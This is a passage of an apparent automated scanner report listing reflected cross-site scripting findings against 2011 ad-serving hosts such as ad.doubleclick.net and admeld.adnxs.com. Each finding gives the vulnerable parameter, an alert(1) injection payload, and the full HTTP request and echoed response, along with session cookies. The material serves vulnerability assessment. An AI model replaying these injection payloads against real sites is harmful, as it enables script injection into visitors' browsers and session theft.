Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=232edb5"-alert(1)-"b77c08485d3&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&e
...[SNIP]...

3.448. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11d41'-alert(1)-'e747be08079 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=2311d41'-alert(1)-'e747be08079&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=2311d41'-alert(1)-'e747be08079&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&e
...[SNIP]...

3.449. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b14c'-alert(1)-'e00b177ebcb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=101396b14c'-alert(1)-'e00b177ebcb&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Ess
...[SNIP]...
<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=101396b14c'-alert(1)-'e00b177ebcb&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.450. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9669b"-alert(1)-"9139c319cc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=101399669b"-alert(1)-"9139c319cc&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2064

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=101399669b"-alert(1)-"9139c319cc&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.451. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2244'-alert(1)-'6dd62e263af was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36b2244'-alert(1)-'6dd62e263af&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Ess
...[SNIP]...
23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36b2244'-alert(1)-'6dd62e263af&event=58/http://spongecell.com/api/placements/46405574/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=61212128\" target=\"_blank\">
...[SNIP]...

3.452. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b45c"-alert(1)-"c4ba360ac47 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.367b45c"-alert(1)-"c4ba360ac47&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Ess
...[SNIP]...
23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.367b45c"-alert(1)-"c4ba360ac47&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongecell.com/api/placements/46405540.js\" type=\"text/javascript\">
...[SNIP]...

3.453. http://adimg.tv.com/mac-ad [&&&&&&&&adfile parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://adimg.tv.com
Path:	/mac-ad

Issue detail

The value of the &&&&&&&&adfile request parameter is copied into the HTML document as plain text between tags. The payload 2f904<a>85248737393 was submitted in the &&&&&&&&adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?SP=16&_RGROUP=8400&NCAT=1%3A&CNET-BRAND-ID=16&HUB=cn&&&CNET-SITE-ID=45&ASSET_HOST=adimg.tv.com&PTYPE=2001&CNET-ONTOLOGY-NODE-ID=1&&&&POS=100&ENG:DATETIME=2011.04.27.19.36.59&SYS:RQID=01c13-ad-e6:4DB89CF8CCE07&&&&&&&&&adfile=11487/11/506296_wc.ca2f904<a>85248737393 HTTP/1.1
Host: adimg.tv.com
Proxy-Connection: keep-alive
Referer: http://www.tv.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; MAD_SESSION=c; MAD_FIRSTPAGE=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:44:53 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 23:44:53 GMT
Content-Length: 604


...[SNIP]...

3.454. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld-match.dotomi.com
Path:	/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a348c'%3balert(1)//e1f025d63a4 was submitted in the admeld_adprovider_id parameter. This input was echoed as a348c';alert(1)//e1f025d63a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78a348c'%3balert(1)//e1f025d63a4&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946366067&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:29 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78a348c';alert(1)//e1f025d63a4&external_user_id=0&expiration=1304205629" alt="" />');

3.455. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld-match.dotomi.com
Path:	/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b58c'%3balert(1)//dad592a2a37 was submitted in the admeld_callback parameter. This input was echoed as 7b58c';alert(1)//dad592a2a37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match7b58c'%3balert(1)//dad592a2a37 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946366067&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:32 GMT
X-Name: rtb-o06
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match7b58c';alert(1)//dad592a2a37?admeld_adprovider_id=78&external_user_id=0&expiration=1304205632" alt="" />');

3.456. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82349'-alert(1)-'22f081c26bf was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=19382349'-alert(1)-'22f081c26bf&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946273585&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG3H<gj[2<?0P(*AuB-u**g1:XIC/YEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y%yo7!4az!Bs8L+-M%osqFWcxSx*meA9Z7:=o0?Z=_']Z<'!F+iv8//=P6:DnR0^:5vikVE*bv'Z+%Tc?M-=]4uB+1ccn3j+k2o<x>W$gK3Zb>nmW)1'%t/*#w5xXB'+K7$OZDTnHM`)s3*[`hUEAwY-atIxWZl9cDe%6-ZtpOORa]#STwYBtaP2Z*8B78<*XQoc.OKE+%wr()L(R3*STLrzS#1AAopHB@[+9%NA%e%d1>Ler!?bMpq=HRa:^cWU$pOz7Y`%fqR5mD7Vk$t?v0Da+bD$f?>zx7n3Nc@.8mOISoJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl(aK7$+Uj`9ZK_i*i7nx76s9#biF92J+j@=NZDq@F%Zd38Hw<vKX_^Lxqr/haEvfM5A.vE#yyrYG.xAt9aoHuF[:Dx!X-_o`Bu>JvlaRCtBqT(f-%Ek>TVDmy<g+ba]ASsIT?E$^xmFwtFzYq5f@6f#'/n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 28-Apr-2011 23:18:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 26-Jul-2011 23:18:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:18:18 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=19382349'-alert(1)-'22f081c26bf&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.457. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df9d8'-alert(1)-'b49fb902e75 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchdf9d8'-alert(1)-'b49fb902e75 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946273585&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG3H<gj[2<?0P(*AuB-u**g1:XIC/YEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y%yo7!4az!Bs8L+-M%osqFWcxSx*meA9Z7:=o0?Z=_']Z<'!F+iv8//=P6:DnR0^:5vikVE*bv'Z+%Tc?M-=]4uB+1ccn3j+k2o<x>W$gK3Zb>nmW)1'%t/*#w5xXB'+K7$OZDTnHM`)s3*[`hUEAwY-atIxWZl9cDe%6-ZtpOORa]#STwYBtaP2Z*8B78<*XQoc.OKE+%wr()L(R3*STLrzS#1AAopHB@[+9%NA%e%d1>Ler!?bMpq=HRa:^cWU$pOz7Y`%fqR5mD7Vk$t?v0Da+bD$f?>zx7n3Nc@.8mOISoJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl(aK7$+Uj`9ZK_i*i7nx76s9#biF92J+j@=NZDq@F%Zd38Hw<vKX_^Lxqr/haEvfM5A.vE#yyrYG.xAt9aoHuF[:Dx!X-_o`Bu>JvlaRCtBqT(f-%Ek>TVDmy<g+ba]ASsIT?E$^xmFwtFzYq5f@6f#'/n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 28-Apr-2011 23:18:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 26-Jul-2011 23:18:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:18:22 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchdf9d8'-alert(1)-'b49fb902e75?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.458. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5fd3'%3balert(1)//cafcf215564 was submitted in the admeld_adprovider_id parameter. This input was echoed as b5fd3';alert(1)//cafcf215564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73b5fd3'%3balert(1)//cafcf215564&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946366067&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2xpe64Z76BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Wed, 27 Apr 2011 23:20:20 GMT
Expires: Wed, 27 Apr 2011 23:20:21 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Thu, 26-Apr-2012 23:20:21 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73b5fd3';alert(1)//cafcf215564&external_user_id=3419824627245671268"/>');

3.459. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e178a'%3balert(1)//58b8a20ff4d was submitted in the admeld_callback parameter. This input was echoed as e178a';alert(1)//58b8a20ff4d in the application's response.

